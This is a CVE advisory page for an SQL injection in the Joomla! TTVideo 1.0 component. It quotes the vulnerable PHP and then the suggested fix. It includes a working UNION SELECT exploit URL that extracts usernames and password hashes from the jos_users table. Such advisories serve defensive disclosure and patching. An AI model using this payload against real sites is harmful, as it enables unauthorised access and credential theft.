CVE-2010-2909
Description
SQL injection vulnerability in ttvideo.php in the TTVideo (com_ttvideo) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the cid parameter in a video action to index.php.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component TTVideo 1.0 - SQL Injection
TTVideo 1.0 Joomla Component SQL Injection Vulnerability
Download link: http://www.toughtomato.com/resources/downloads/joomla-1.5/components/ttvideo/
Name TTVideo
Vendor http://www.toughtomato.com
Versions Affected 1.0
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-07-27
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
________________________
TTVideo is a Joomla! component that makes use of the
popular video sharing site Vimeo to create a video
library.
II. DESCRIPTION
_______________
A parameter in ttvideo.php is not properly sanitised
before being used in a SQL query.
III. ANALYSIS
_____________
Summary:
A) SQL Injection
A) SQL Injection
________________
The parameter cid passed to ttvideo.php when task is set
to video is not properly sanitised before being used in
a SQL query. This can be exploited to manipulate SQL
queries by injecting arbitrary SQL code. The following
is the vulnerable code:
ttvideoController.php (line 40):
```php
// The request value is read with getVar() and the 'default' filter, which
// imposes no type restriction, so cid reaches the model as a raw string.
function video() {
    $cid = JRequest::getVar('cid', null, 'default');
    // ... remainder of the task not shown in the advisory
}
```
ttvideo.php (line 188):
```php
// $id is interpolated straight into the query with no cast or quoting,
// so a crafted cid value becomes part of the SQL statement.
function getVideo($id) {
    $db = $this->getDBO();
    $db->setQuery("SELECT * from #__ttvideo WHERE id=$id");
    $video = $db->loadObject();
    if ($video === null)
        JError::raiseError(500, 'Video with ID: '.$id.' not found.');
    return $video;
}
```
IV. SAMPLE CODE
_______________
A) SQL Injection
http://site/path/index.php?option=com_ttvideo&task=video&cid=-1 UNION SELECT 1,2,3,4,5,6,7,8,CONCAT(username,0x3A,password),10,11,12,13,14,15,16,17 FROM jos_users
V. FIX
______
Use JRequest::getInt instead of JRequest::getVar when reading cid, so that only an integer reaches the query.
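The fix the advisory proposes, applied to the two functions quoted above, as an added example (this is not the vendor's own patch); it assumes the Joomla! 1.5 JRequest, JModel and JError APIs already used by the original code, and adds an integer cast inside the model as defence in depth.

```php
<?php
// Added example, not the vendor's patched code.
// Assumes the Joomla! 1.5 JRequest / JModel / JError APIs used by com_ttvideo.

// ttvideoController.php
function video() {
    // getInt() passes the value through Joomla's INT filter: the first integer
    // found in the input is kept and everything after it is discarded, so a
    // value such as "-1 UNION SELECT ..." arrives here as the integer -1 and
    // the injected SQL never reaches the model.
    $cid = JRequest::getInt('cid', 0);
    // ... remainder of the task, which hands $cid to getVideo() (assumption)
}

// ttvideo.php
function getVideo($id) {
    // Do not trust the caller either: force an integer before building the
    // query. With an integer there is no string context left to break out of.
    $id = (int) $id;
    if ($id <= 0) {
        JError::raiseError(404, 'Invalid video ID.');
    }
    $db = $this->getDBO();
    $db->setQuery('SELECT * FROM #__ttvideo WHERE id = ' . $id);
    $video = $db->loadObject();
    if ($video === null) {
        JError::raiseError(500, 'Video with ID: ' . $id . ' not found.');
    }
    return $video;
}
```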
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| toughtomato | com_ttvideo | 1.0 | |
| joomla | joomla! | | |
References
- http://adv.salvatorefresta.net/TTVideo_1.0_Joomla_Component_SQL_Injection_Vulnerability-27072010.txt
- http://osvdb.org/66630
- http://secunia.com/advisories/40716
- http://www.exploit-db.com/exploits/14481
- http://www.securityfocus.com/archive/1/512685/100/0/threaded
- http://www.securityfocus.com/archive/1/512709/100/0/threaded
- http://www.toughtomato.com/downloads/16-comttvideo-1-0-1/file
- https://exchange.xforce.ibmcloud.com/vulnerabilities/60662
CWEs
CWE-89